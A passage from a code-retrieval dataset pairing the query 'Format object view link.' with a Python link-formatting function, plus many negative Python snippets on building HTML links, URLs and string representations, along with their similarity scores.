mark_safe(template_code)", "def format_url(self, url, text):\r\n return u'<a href=\"%s\">%s</a>' % (escape(url), text)", "def object_view_with_links(obj, request):\n _view = _object_view(obj, request)\n obj_link = obj_ui_link = \"\"\n # UI link to the real business object referenced as topic\n if isinstance(obj, Posting):\n obj_ui_link = request.link(obj, app=get_root(request).child(\"activitystream\"))\n else:\n try:\n obj_link = request.link(obj, app=_get_collection_app(request))\n except morepath.error.LinkError:\n pass\n obj_ui_link = get_ui_link(request, obj) or \"\"\n _view.update({\n \"object_id\": obj_link,\n \"object_ui_link\": obj_ui_link})\n return _view", "def get_links(self):\n links = \"\"\n if self.title != \"\":\n links += html_link_to_tag(\n plain_to_html(self.title), self.title, self.proc\n )\n return links + \\\n html_unordered_list([x.get_links() for x in self.subsections])", "def link_doc(link_source, link_type, links):\n ldoc_id = link_doc_id(link_source, link_type, links)\n curr_time = datetime.datetime.utcnow()\n ldoc = {\n 
'_id': ldoc_id,\n 'type': 'link',\n 'time': {'year': curr_time.year,\n 'month': curr_time.month,\n 'day': curr_time.day,\n 'iso': curr_time.isoformat()\n },\n 'source': link_source,\n 'link_type': link_type,\n 'links': links\n }\n return ldoc", "def format_item(self,obj):\n return unicode(obj)", "def get_str(self, obj):\n if self.pretty:\n return pprint.pformat(obj)\n else:\n return str(obj)", "def generate_link_attr(d: Dict):\n d.update({\"link\": urljoin(\"https://vdb-kasf1i23nr1kl2j4.rapid7.com/v1/content/\", d.get(\"identifier\"))})", "def output(self):\n entry = []\n entry.append('''<entry>\n <title mode=\"escaped\" type=\"text/html\">%(title)s</title>\n <link rel=\"alternate\" type=\"text/html\" href=\"%(url)s\" />\n <issued>%(issued)s</issued>\n <modified>%(modified)s</modified>\n ''' % self.__dict__)\n \n if self.feed:\n entry.append('''<link rel=\"service.feed\" type=\"application/atom+xml\" href=\"%s\" title=\"%s\" />''' % (self.feed, self.feed_title))\n if self.comments:\n entry.append('''<link rel=\"comments\" type=\"application/atom+xml\" href=\"%s\" />''' % self.comments)\n if self.author:\n entry.append('''<author>%s</author>''' % self.author.output())\n for person in self.contributors:\n entry.append('''<contributor>%s</contributor>''' % person.output())\n if self.id:\n entry.append('''<id>%s</id>''' % self.id)\n if self.created:\n entry.append('''<created>%s</created>''' % self.created)\n if self.summary:\n entry.append('''<summary type=\"application/xhtml+xml\" xml:base=\"%s\" xml:space=\"preserve\">\n <div xmlns=\"http://www.w3.org/1999/xhtml\">%s</div></summary>''' % (self.base_url, self.summary))\n if self.content:\n #entry.append('''<content type=\"application/xhtml+xml\" xml:base=\"%s\" xml:space=\"preserve\">\n # <div xmlns=\"http://www.w3.org/1999/xhtml\">%s</div></content>''' % (self.base_url, self.content))\n entry.append('''<content type=\"text/html\" mode=\"escaped\" xml:base=\"%s\" xml:space=\"preserve\">%s</content>''' % (self.base_url, self.content))\n \n entry.append('''</entry>''')\n return '\\n'.join(entry)", "def formatall(obj):\n result = \"\"\n if isinstance(obj, list):\n# i = 0\n for obj in obj:\n #printf(\">>> [%d] >>> \", i)\n result += format(obj)\n result += \"\\n\"\n# i += 1\n return result\n if isinstance(obj, dict):\n for key, value in obj.items():\n result += \"%-15s : \" % key\n result += format(value)\n result += \"\\n\"\n return result\n return format(obj)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __repr__(self):\n dbline = ' - {0}'\n fcline = ' + {0}'\n output = ['{0} ({1})'.format(self.name, self.url)]\n output.append('-' * len(output[0]))\n output.append(' {0}'.format(self.mxd))\n for db in self._dbnames:\n output.append(dbline.format(db))\n for fc in sorted(self._datastructure[db]):\n output.append(fcline.format(fc))\n output.append('')\n output.append('')\n return '\\n'.join(output)", "def __repr__(self):\n return pprint.saferepr(self.redirects)", "def make_links(traceback):\r\n\r\n lwords = traceback.split('\"')\r\n\r\n # Making the short circuit compatible with <= python2.4\r\n result = (len(lwords) != 0) and lwords[0] or ''\r\n\r\n i = 1\r\n\r\n while i < len(lwords):\r\n link = make_link(lwords[i])\r\n\r\n if link == '':\r\n result += '\"' + lwords[i]\r\n 
else:\r\n result += link\r\n\r\n if i + 1 < len(lwords):\r\n result += lwords[i + 1]\r\n i = i + 1\r\n\r\n i = i + 1\r\n\r\n return result", "def prettyformat(self):\n \n import re\n\n html = self.get_htmlsrc()\n if type(html) == type([]):\n html = html[0]\n if type(html) != type(\"\"):\n try:\n html = str(html)\n except:\n html = html.__str__()\n \n tmp = BeautifulSoup(html)\n base = self.target_baseurl()\n# aitems = tmp.findAll(\"a\",href=re.compile(\"^\\/\"))\n aitems = tmp.findAll(\"a\",href=re.compile(\"^[^hH]\"))\n for i in aitems:\n u = i['href']\n if u[0] != '/':\n i['href'] = base + '/' + u\n else: \n i['href'] = base + u\n# imgitems = tmp.findAll(\"img\",src=re.compile(\"^\\/\"))\n imgitems = tmp.findAll(\"img\",src=re.compile(\"^[^hH]\"))\n for j in imgitems:\n v = j['src']\n if v[0] != '/':\n j['src'] = base + '/' + v\n else: \n j['src'] = base + v\n return tmp", "def __str__(self):\n if self.external_form:\n return self.external_form\n if self.url:\n return self.format('url')\n if self.uuid:\n return self.format('uuid')\n return self.format('path')", "def format_link(attrs: Dict[tuple, str], new: bool = False):\n try:\n p = urlparse(attrs[(None, 'href')])\n except KeyError:\n # no href, probably an anchor\n return attrs\n\n if not any([p.scheme, p.netloc, p.path]) and p.fragment:\n # the link isn't going anywhere, probably a fragment link\n return attrs\n\n c = urlparse(settings.SITE_URL)\n if p.netloc != c.netloc:\n # link is external - secure and mark\n attrs[(None, 'target')] = '_blank'\n attrs[(None, 'class')] = attrs.get((None, 'class'), '') + ' external'\n attrs[(None, 'rel')] = 'nofollow noopener noreferrer'\n\n return attrs", "def getExpandedLinks():", "def link_the_references(obj, path):\n if not obj:\n log.bug(\"obj non è un parametro valido: %s\" % obj)\n return\n\n if not path:\n log.bug(\"path non è un parametro valido: %s\" % path)\n return\n\n # -------------------------------------------------------------------------\n\n for attr_name, attr_value in obj.__dict__.iteritems():\n if attr_name[0] == \"_\" or attr_name in obj.VOLATILES:\n continue\n\n # Cerca eventuali riferimenti da collegare alle istanze nei dati che\n # si rifanno a delle classi con altri attributi (che quindi hanno un\n # modulo da dove reperirle)\n if attr_name in obj.SCHEMA and obj.SCHEMA[attr_name][0]:\n if isinstance(attr_value, list):\n for i, sub_value in enumerate(attr_value):\n sub_path = \"%s.%s[%s]\" % (path, attr_name, i)\n link_the_references(sub_value, sub_path)\n elif isinstance(attr_value, dict):\n for key, sub_value in attr_value.iteritems():\n sub_path = \"%s.%s[%s]\" % (path, attr_name, repr(key))\n link_the_references(sub_value, sub_path)\n elif attr_value:\n link_the_references(attr_value, \"%s.%s\" % (path, attr_name))\n\n # Se la variabile si trova nel dizionario REFERENCES della classe\n # allora probabilmente è un dato precedentemente acquisito come\n # stringa ma che deve essere convertito al riferimento di dato\n elif attr_name in obj.REFERENCES or attr_name in obj.WEAKREFS:\n # La variabile di riferimento può benissimo essere None, già di\n # default è così, significa che non ha trovato nessuna etichetta\n # relativa nel file del dato, questo è normale per etichette\n # facoltative\n if attr_value is None:\n continue\n\n # Se la variabile si trova nel dizionario WEAKREFS della classe\n # si comporta come una variabile relativa alle REFERENCES\n # tuttavia se questa viene rimossa dal gioco il riferimento\n # debole va a mancare automaticamente\n if attr_name in 
obj.WEAKREFS:\n table_names = obj.WEAKREFS[attr_name]\n else:\n # Le tabelle per la ricerca del riferimento possono essere più\n # d'una, ognuna delle quali però deve possere delle chiavi\n # differenti tra loro (come per esempio il database dei mob\n # e quello degli oggetti)\n table_names = obj.REFERENCES[attr_name]\n\n # Se var è una stringa allora cerca il riferimento tra le tabelle\n if isinstance(attr_value, basestring):\n var = _search_the_reference(attr_name, attr_value, table_names, path)\n if var and attr_name in obj.WEAKREFS:\n setattr(obj, attr_name, weakref.ref(var or None))\n else:\n setattr(obj, attr_name, var or None)\n # Se var è una lista allora deve trovare tutti i riferimenti di\n # ogni elemento che sono identificati da un codice-stringa\n elif type(attr_value) == list:\n new_list = []\n for v in attr_value:\n value = _search_the_reference(attr_name, v, table_names, path)\n if value:\n if attr_name in obj.WEAKREFS:\n new_list.append(weakref.ref(value))\n else:\n new_list.append(value)\n setattr(obj, attr_name, new_list)\n elif type(attr_value) == dict:\n # (TD)\n raise NotImplementedError", "def print_link(link):\n print('<' + helper(link).rstrip() + '>')", "def _inline(line):\n if len(line) == 0:\n return ''\n\n # Regexp of protocols supported in hyperlinks (should be protocols that\n # we can expect web browsers to support)\n protocols = \"https?|ftp|sftp|file|afs|nfs\"\n\n\n # Prepare usual links: prefix every \"www.\" with \"http://\"\n # unless there is a // before\n line = re.sub('(^|\\s|[^\\/])(www\\.)', '\\\\1http://\\\\2', line, re.I);\n\n # replace the @ sign with an HTML entity, if it is used within\n # an url (e.g. for pointers to mailing lists). This way, the\n # @ sign doesn't get mangled in the e-mail markup code\n # below. See bug #2689 on http://gna.org/ for reference.\n line = re.sub(\"([a-z]+://[^<>[:space:]]+)@\", \"\\\\1&#64;\", line, re.I)\n\n # Prepare the markup for normal links, e.g. http://test.org, by\n # surrounding them with braces []\n # (& = begin of html entities, it means a end of string unless\n # it is &amp; which itself is the entity for &)\n line = re.sub('(^|\\s|[^\\[])((' + protocols + '):\\/\\/(&amp;|[^\\s&]+[a-z0-9\\/^])+)',\n '\\\\1[\\\\2]', line, re.I)\n\n # do a markup for mail links, e.g. info@support.org\n # (do not use utils_emails, this does extensive database\n # search on the string\n # and replace addresses in several fashion. Here we just want to make\n # a link). 
Make sure that 'cvs -d:pserver:anonymous@cvs.sv.gnu.org:/...'\n # is NOT replaced.\n line = re.sub(\"(^|\\s)([a-z0-9_+-.]+@([a-z0-9_+-]+\\.)+[a-z]+)(\\s|$)\",\n '\\\\1' + '<a href=\"mailto:\\\\2\">\\\\2</a>' + '\\\\4', line, re.I)\n\n # Links between items\n # FIXME: it should be i18n, but in a clever way, meaning that everytime\n # a form is submitted with such string, the string get converted in\n # english so we always get the links found without having a regexp\n # including every possible language.\n # Trackers URLs disabled until trackers are actually implemented :)\n #trackers = {\n # \"bugs?\" : \"bugs/?\",\n # \"support|sr\" : \"support/?\",\n # \"tasks?\" : \"task/?\",\n # \"patch\" : \"patch/?\",\n # # In this case, we make the link pointing to support, it wont matter,\n # # the download page is in every tracker and does not check if the tracker\n # # is actually used\n # \"files?\" : \"support/download.php?file_id=\",\n # }\n #for regexp,link in trackers:\n # # Allows only two white space between the string and the numeric id\n # # to avoid having too time consuming regexp. People just have to pay\n # # attention.\n # line = re.sub(\"(^|\\s|\\W)($regexp)\\s{0,2}#([0-9]+)\",\n # '\\1<em><a href=\"' + 'sys_home'\n # + link + '\\\\3\">\\\\2&nbsp;#\\\\3</a></em>',\n # line, re.I)\n\n # add an internal link for comments\n line = re.sub('(comments?)\\s{0,2}#([0-9]+)',\n '<em><a href=\"#comment\\\\2\">\\\\1&nbsp;#\\\\2</a></em>',\n line, re.I)\n\n # Add support for named hyperlinks, e.g.\n # [http://savane-forge.org/ Text] -> <a href=\"http://savane-forge.org/\">Text</a>\n line = re.sub(\n # find the opening brace '['\n '\\['\n # followed by the protocol, either http:// or https://\n + '((' + protocols + '):\\/\\/'\n # match any character except whitespace or the closing\n # brace ']' for the actual link\n + '[^\\s\\]]+)'\n # followed by at least one whitespace\n + '\\s+'\n # followed by any character (non-greedy) and the\n # next closing brace ']'\n + '(.+?)\\]',\n '<a href=\"\\\\1\">\\\\3</a>', line)\n\n # Add support for unnamed hyperlinks, e.g.\n # [http://savane-forge.org/] -> <a href=\"http://savane-forge.org/\">http://savane-forge.org/</a> \n line = re.sub(\n # find the opening brace '['\n '\\['\n # followed by the protocol, either http:// or https://\n # (FIXME: which protocol does it makes sense to support, which one\n # should we ignore?)\n + '((' + protocols + '):\\/\\/'\n # match any character except whitespace (non-greedy) for\n # the actual link, followed by the closing brace ']'\n + '[^\\s]+?)\\]',\n '<a href=\"\\\\1\">\\\\1</a>', line)\n\n # *word* -> <strong>word</strong>\n line = re.sub(\n # find an asterisk\n '\\*'\n # then one character (except a space or asterisk)\n + '([^* ]'\n # then (optionally) any character except asterisk\n + '[^*]*?)'\n # then an asterisk\n + '\\*',\n '<strong>\\\\1</strong>', line)\n\n # _word_ -> <em>word</em>\n line = re.sub(\n # allow for the pattern to start at the beginning of a line.\n # if it doesn't start there, the character before the slash\n # must be either whitespace or the closing brace '>', to\n # allow for nested html tags (e.g. 
<p>_markup_</p>).\n # Additionally, the opening brace may appear.\n # See bug #10571 on http://gna.org/ for reference.\n '(^|\\s+|>|\\()'\n # match the underscore\n + '_'\n # match any character (non-greedy)\n + '(.+?)'\n # match the ending underscore and either end of line or\n # a non-word character\n + '_(\\W|$)',\n '\\\\1<em>\\\\2</em>\\\\3',\n line)\n\n return line", "def __str__(self) -> str:\n outstr = self.access\n if self.demux is not None:\n outstr += \"/\" + self.demux\n outstr += \"://\" + self.url\n if self.title is not None or \\\n self.chapter is not None or \\\n self.endtitle is not None or \\\n self.endchapter is not None:\n outstr += '#'\n if self.title is not None:\n outstr += self.title\n if self.chapter is not None:\n outstr += \":\" + self.chapter\n if self.endtitle is not None or \\\n self.endchapter is not None:\n outstr += '-'\n if self.endtitle is not None:\n outstr += self.endtitle\n if self.endchapter is not None:\n outstr += ':' + self.endchapter\n if self.options is not None:\n for option in self.options.items():\n outstr += ' :' + option\n return outstr", "def antweb_links(request, format='csv'):\n\n\n\ttaxonomy = []\n\tif request.GET.get('taxon_code'):\n\t\ttaxonomy = Taxonomy.objects.raw(\"\"\"\n\t\tSELECT taxon_code, subfamily_name, genus_name, species_name\n\t\tFROM map_taxonomy_list\n\t\tWHERE taxon_code = %s\n\t\t\"\"\", [request.GET.get('taxon_code')])\n\t\t\n\t\t# serialize to JSON\n\t\tjson_objects = [{'key': t.taxon_code, 'speciesName': t.species_name, 'genusName': t.genus_name, 'subfamilyName': t.subfamily_name} for t in taxonomy]\n\t\t\n\t\treturn JSONResponse({'taxonomy': json_objects})\n\t\t\n\telif request.GET.get('genus_name'):\n\t\ttaxonomy = Taxonomy.objects.raw(\"\"\"\n\t\tSELECT genus_name, subfamily_name,taxon_code\n\t\tFROM map_taxonomy_list\n\t\tWHERE genus_name = %s\n\t\tGROUP BY genus_name, subfamily_name,taxon_code\n\t\t\"\"\", [request.GET.get('genus_name')])\n\t\t\n\t\t# serialize to JSON\n\t\tjson_objects = [{'key': t.genus_name, 'subfamilyName': t.subfamily_name} for t in taxonomy]\n\t\t\n\t\treturn JSONResponse({'taxonomy': json_objects})\n\t\n\telse:\n\t\treturn JSONResponse({'taxonomy': []})", "def format_link(self, link):\n new_link = \"/\".join(link.split(\"/\")[0:3])\n return \"http://www.imdb.com\" + new_link", "def __str__ (self) :\n\t\ttext_rule = \"\"\n\t\t\n\t\tfor key, rules in self.production_rules.items() :\n\t\t\ttext_rule += \"\\nRULE \" + key + \" = [\\n\\t\"\n\t\t\trule_in_a_line = []\n\t\t\tfor rule in rules :\n\t\t\t\t#rule_in_a_line.append(\" + \".join([r.val+\"(\"+r.type+\")\" for r in rule]))\n\t\t\t\trule_in_a_line.append(\" + \".join([r.__str__() for r in rule]))\n\t\t\ttext_rule += \"\\n\\t\".join(rule_in_a_line) + \"\\n]\"\n\t\ttext_rule += \"\\n\\n\"\n\t\t\n\t\ttext_rule += \"LABELS = \" + json.dumps (self.labels, indent=2) + '\\n\\n'\n\n\t\ttext_rule += \"STRUCT = [\\n{}\\n]\\n\\n\".format(\n\t\t\t\"\".join([\n\t\t\t\t\"\\t{} : {{\\n\\t\\t{}\\n\\t}}\\n\".format (\n\t\t\t\t\tkey, \", \\n\\t\\t\".join(val)\n\t\t\t\t) for key, val in self.keeper.items()\n\t\t\t])\n\t\t)\n\t\ttext_rule += \"STRNODE = [\\n{}\\n]\\n\\n\".format(\n\t\t\t\"\".join(self.strnodes)\n\t\t)\n\t\tfor regex, label in self.tokens :\n\t\t\ttext_rule += \"TOKEN \" + label + \" = regex('\" + regex + \"')\\n\"\n\n\t\treturn text_rule", "def __repr__(self):\n args = []\n if self.name != \"alpha\":\n args.append(repr(self.name))\n if self.propertiesstr:\n args.append(repr(self.propertiesstr))\n elif self.propertiesstr:\n 
args.append(\"attr=%r\" % self.propertiesstr)\n return \"%s(%s)\" % (type(self).__name__, \", \".join(args))" ]
[ "0.784745", "0.6504912", "0.64552146", "0.6426217", "0.62232155", "0.6217698", "0.60861593", "0.60861593", "0.60610193", "0.60496616", "0.5940354", "0.59321237", "0.5914688", "0.58717525", "0.5870953", "0.5845969", "0.5824419", "0.58027077", "0.57641745", "0.57560444", "0.57327914", "0.5715841", "0.5698075", "0.5693841", "0.5693164", "0.5693031", "0.56775624", "0.5668995", "0.5656696", "0.5642389", "0.56277734", "0.56265193", "0.56124365", "0.5593817", "0.55695003", "0.5533753", "0.55312", "0.5523837", "0.55153847", "0.5514151", "0.5511813", "0.5500131", "0.5493986", "0.549361", "0.5491652", "0.54671484", "0.545604", "0.54496294", "0.5447277", "0.54109913", "0.5408396", "0.5405952", "0.5401387", "0.53867877", "0.5381744", "0.5377864", "0.5376137", "0.5372304", "0.53598523", "0.5345939", "0.53452367", "0.5344011", "0.5325346", "0.53231794", "0.5319263", "0.5313906", "0.5297503", "0.5290494", "0.5289116", "0.5278131", "0.5275255", "0.5267903", "0.5262328", "0.52602017", "0.52481854", "0.5234007", "0.5231144", "0.52290934", "0.52284575", "0.52253824", "0.5223548", "0.52196616", "0.52196616", "0.52196616", "0.52196616", "0.5208965", "0.520751", "0.5204973", "0.5202219", "0.5195024", "0.51940584", "0.5193685", "0.51848644", "0.51815224", "0.5181074", "0.5177807", "0.5171653", "0.51646614", "0.51598763", "0.5157449" ]
0.72780514
1
Format object view link.
def object_formatter(v, c, m, p): return Markup('<a href="{0}">{1}</a>'.format( link_func(m), text))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def link(text, link_func):\n def object_formatter(v, c, m, p):\n \"\"\"Format object view link.\"\"\"\n return Markup('<a href=\"{0}\">{1}</a>'.format(\n link_func(m), text))\n return object_formatter", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/collection/{}'.format(obj.id)\n )", "def object_view_with_links(obj, request):\n _view = _object_view(obj, request)\n obj_link = obj_ui_link = \"\"\n # UI link to the real business object referenced as topic\n if isinstance(obj, Posting):\n obj_ui_link = request.link(obj, app=get_root(request).child(\"activitystream\"))\n else:\n try:\n obj_link = request.link(obj, app=_get_collection_app(request))\n except morepath.error.LinkError:\n pass\n obj_ui_link = get_ui_link(request, obj) or \"\"\n _view.update({\n \"object_id\": obj_link,\n \"object_ui_link\": obj_ui_link})\n return _view", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/media/{}'.format(obj.id)\n )", "def _change_link(self, obj, display_text=None):\n if not obj:\n return '?'\n fragments = [obj._meta.app_label, obj._meta.model_name, 'change']\n change_url = reverse(\"admin:{}\".format('_'.join(fragments)),\n args=(obj.id,))\n display_text = display_text or unicode(obj)\n return format_html(\"<a href={}>{}</a>\", change_url, display_text)", "def href(obj):\n if isinstance(obj, Filing):\n return reverse('filing', args=(obj.region, obj.name, obj.period_name))\n else:\n raise ValueError('cannot build a URL for {}.{} objects'.format(\n type(obj).__module__, type(obj).__name__))", "def view_link(self, obj):\n if obj.cwr:\n url = reverse(\n 'admin:music_publisher_ackimport_change', args=(obj.id,))\n url += '?preview=true'\n return mark_safe(\n '<a href=\"{}\" target=\"_blank\">View CWR</a>'.format(url))", "def pybb_link(object, anchor=''):\n\n url = hasattr(object, 'get_absolute_url') and object.get_absolute_url() or None\n #noinspection PyRedeclaration\n anchor = anchor or smart_text(object)\n return mark_safe('<a href=\"%s\">%s</a>' % (url, escape(anchor)))", "def viewurilink(uri) :\n\tname = schema.uri_to_name(uri)\n\tif name :\n\t\turl = '/view/name/' + quote(name)\n\telif uri[:7] == \"http://\" :\n\t\turl = '/view/uri/' + uri[7:]\n\telse :\n\t\turl = '/view/uri?id=' + uri\n\t\n\treturn '<a href=\"%s\">%s</a>' % (url, name or n.shorten(uri))", "def detail_link(db_obj, text=None):\n\n def build_link(obj):\n name = str(obj) if text is None else text\n return _make_link(obj.detail_url(), name)\n\n return mark_safe(', '.join(map(build_link, as_list(db_obj))))", "def view_bed_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"bed.index_view\", search=model.bed.name), model.bed.name)\n )\n if model.bed\n else u\"\"\n )", "def linkify(field_name):\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def view_link(self, obj):\n if obj.cwr:\n url = reverse(\n 'admin:music_publisher_cwrexport_change', args=(obj.id,))\n url += '?preview=true'\n return mark_safe(\n '<a href=\"{}\" target=\"_blank\">View 
CWR</a>'.format(url))", "def linkify(field_name):\n\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def item_link(self, obj):\n if obj.item is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_mediaitem_change', args=(obj.item.pk,)),\n obj.item.title if obj.item.title != '' else '[Untitled]'\n )", "def __str__(self):\n\t\treturn '{0} ({1})'.format (self.name, self.link)", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def fmt(e):\n name = str(e.label.first() if hasattr(e, 'label') and e.label else e)\n if re.match(r'^[a-z]+://', name):\n return link.format(name=name, url=name)\n if hasattr(e, 'label') and e.label:\n name = e.label.first()\n url = name if re.match(r'^[a-z]+://', name) else '#' + name\n return link.format(name=name, url=url)\n elif re.match(r'^[a-z]+://', str(e)):\n return link.format(name=e, url=e)\n else:\n return str(e).replace('owl.', 'owl:')", "def get_object_view_url(self, nuxeo_id):\n parts = urlparse.urlsplit(self.nx.conf[\"api\"])\n url = \"{}://{}/Nuxeo/nxdoc/default/{}/view_documents\".format(parts.scheme, parts.netloc, nuxeo_id) \n return url", "def getLink(self):", "def cook(self, obj, request, field_name):\n view_url = ''\n edit_url = ''\n \n if hasattr(obj, 'get_absolute_url'):\n view_url = obj.get_absolute_url();\n if request.user.has_perm('%s.change_%s' %(obj._meta.app_label, obj._meta.model_name)):\n\t\t\tedit_url = reverse('admin:%s_%s_change' %(obj._meta.app_label, obj._meta.model_name), args=[obj.id])\n\t\t\n result = {'text': unicode(obj),\n 'view_url': view_url,\n 'edit_url': edit_url\n }\n return result", "def deriveLinkfromObject(obj, scale=1, parent_link=True, parent_objects=True,\n reparent_children=True, nameformat='', scaleByBoundingBox=False):\n log('Deriving link from ' + nUtils.getObjectName(obj), level=\"INFO\")\n # create armature/bone\n bUtils.toggleLayer('link', True)\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.armature_add()\n newlink = bpy.context.active_object\n newlink.name = obj.name + \"_link\"\n newlink.matrix_world = obj.matrix_world\n newlink.phobostype = 'link'\n if scaleByBoundingBox:\n bound_box = (\n max([c[0] for c in obj.bound_box]),\n max([c[1] for c in obj.bound_box]),\n max([c[2] for c in obj.bound_box]),\n )\n newlink.scale = [max(bound_box)*scale] * 3\n else:\n newlink.scale = [scale] * 3\n if obj.parent is not None and parent_link:\n eUtils.parentObjectsTo(newlink, obj.parent)\n if parent_objects:\n eUtils.parentObjectsTo(obj, newlink)\n if reparent_children:\n eUtils.parentObjectsTo(list(obj.children), newlink)\n if bpy.context.scene.phoboswireframesettings.links:\n newlink.display_type = \"WIRE\"\n return newlink", "def view_family_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (url_for(\"family.index_view\", search=model.family.internal_id), model.family,)\n )\n if model.family\n else u\"\"\n )", "def render_url(self, object_id):\r\n return reverse(\"%s:insert_%s_%s_render\" % (\r\n self.admin_site.name,\r\n self.model._meta.app_label,\r\n 
self.model._meta.module_name\r\n ), args=(object_id,))", "def build_url_long(self, obj):\n if obj.slug:\n url = self.request.build_absolute_uri(reverse('build_repo', args=(obj.slug,)))\n return '<a href=\"%s\" target=\"_blank\">%s<a>' % (url, url)\n else:\n return ''", "def view_invoice_link(unused1, unused2, model, unused3):\n del unused1, unused2, unused3\n return (\n Markup(\n u\"<a href='%s'>%s</a>\"\n % (\n url_for(\"invoice.index_view\", search=model.invoice.id),\n model.invoice.invoiced_at.date()\n if model.invoice.invoiced_at\n else \"In progress\",\n )\n )\n if model.invoice\n else u\"\"\n )", "def command_view(arguments):\n global current_mode, current_name\n current_mode = Mode.links\n current_name = arguments[0]\n return 'Now viewing entity \"' + current_name + '\"'", "def linkify(obj, link_text=''):\n try:\n lst = []\n # if obj is not a list, convert it into a list\n if not getattr(obj, '__iter__', False):\n obj = [obj]\n for item in obj:\n if hasattr(item, 'child'):\n item = item.child\n if link_text == '':\n l_text = unicode(item)\n else:\n try:\n link_text = link_text.encode('ascii')\n l_text = getattr(item, link_text, link_text)\n except UnicodeEncodeError:\n l_text = link_text\n if not (isinstance(item, Content) and\n isinstance(l_text, SafeText)):\n l_text = filter.force_escape(l_text)\n format_args = (item.get_absolute_url(), l_text)\n lst.append(mark_safe('<a href=\\'%s\\'>%s</a>' % format_args))\n\n # nonlists obj's should be returned as nonlists\n return lst[0] if len(lst) == 1 else lst\n except:\n return ''", "def renderView(self):\n html = \"\"\n if self.lms.lms == \"other\":\n html += \"_______________________________<br/>\"\n url = \"http://%s\" % self.lms.otherUrl\n html += \"<br/><b>%s </b>\" % self.lms.otherLabel\n html += '<a href=\"%s\">%s</a>' % (url, url) \n return html", "def work_link(self, obj):\n url = reverse('admin:music_publisher_work_change', args=[obj.work.id])\n link = '<a href=\"{}\">{}</a>'.format(url, obj.work)\n return mark_safe(link)", "def __str__(self):\n return '<a href=\"%s\" class=\"%s\" %s>%s</a>' % (self.url, self.cssclass, self.options, self.text)", "def urlLink(self, text=None, url=None, attrs={}):\n if not text:\n text = self.titleOrId()\n text = escape(text)\n if not self.checkRemotePerm(\"View\", self):\n return text\n if not url:\n url = self.getPrimaryUrlPath()\n if len(attrs):\n return '<a href=\"%s\" %s>%s</a>' % (url,\n ' '.join('%s=\"%s\"' % (x,y) for x,y in attrs.items()),\n text)\n else:\n return '<a href=\"%s\">%s</a>' % (url, text)", "def show_orion_url(self, obj):\n return obj.orion_url", "def link(self):\n return f\"[{self.numbered_title}]({self.html_url})\"", "def get_link(self, path, method, view):\n description = self.get_description(path, method, view)\n\n fields = []\n if '---' not in description:\n fields += self.get_path_fields(path, method, view)\n fields += self.get_serializer_fields(path, method, view)\n fields += self.get_pagination_fields(path, method, view)\n fields += self.get_filter_fields(path, method, view)\n\n if description:\n vals = list(yaml.load_all(description))\n description, para_lst = vals[0], vals[1]\n if para_lst and para_lst.get('parameters'):\n for para in para_lst['parameters']:\n fields.append(coreapi.Field(\n name=para['name'],\n required=para['required'],\n location=para.get('paramType', 'query'),\n description=para['description'],\n type=para.get('type', 'string')\n ))\n\n if fields and any([field.location in ('form', 'body') for field in fields]):\n # encoding = 
self.get_encoding(path, method, view)\n encoding = 'multipart/form-data'\n else:\n encoding = None\n\n\n if self.url and path.startswith('/'):\n path = path[1:]\n\n return coreapi.Link(\n url=urlparse.urljoin(self.url, path),\n action=method.lower(),\n encoding=encoding,\n fields=fields,\n description=description\n )", "def _generate_context_link(\n context: mlrun.MLClientCtx, link_text: str = \"view in MLRun\"\n ) -> str:\n return (\n '<a href=\"{}/{}/{}/jobs/monitor/{}/overview\" target=\"_blank\">{}</a>'.format(\n config.resolve_ui_url(),\n config.ui.projects_prefix,\n context.project,\n context.uid,\n link_text,\n )\n )", "def _format_to_link(self, commit):\n return os.path.join(self.mount, \"commits-by-hash\", self._hash_updir(commit), commit) + \"/\"", "def edit_link(db_object, text=None):\n if text is None:\n text = 'edit'\n return _make_link(db_object.update_url(), text)", "def object_view(request, simulation, object_name):\n owner = can_edit(request.user, simulation)\n query = get_query(object_name, simulation)\n large_count = query.count() > OBJECT_THRESHOLD\n network_empty = False\n if object_name == 'link':\n # Allow the user to edit links only if there are at least two centroids,\n # one crossing and one congestion function.\n nb_centroids = get_query('centroid', simulation).count()\n nb_crossings = get_query('crossing', simulation).count()\n nb_functions = get_query('function', simulation).count()\n network_empty = not (nb_centroids >= 2 and nb_crossings >= 1\n and nb_functions >= 1)\n import_form = ImportForm()\n context = {\n 'simulation': simulation,\n 'owner': owner,\n 'count': query.count(),\n 'object': object_name,\n 'large_count': large_count,\n 'network_empty': network_empty,\n 'import_form': import_form,\n }\n return render(request, 'metro_app/object_view.html', context)", "def make_link_to(self, index, caption):\n \n # index is an int\n return '<a href=\"/log/'+str(index)+'\"> '+caption+' '+str(index)+'</a>'", "def _render_link(self, url):\n # The method handlers for the 'text/html' set a flag to 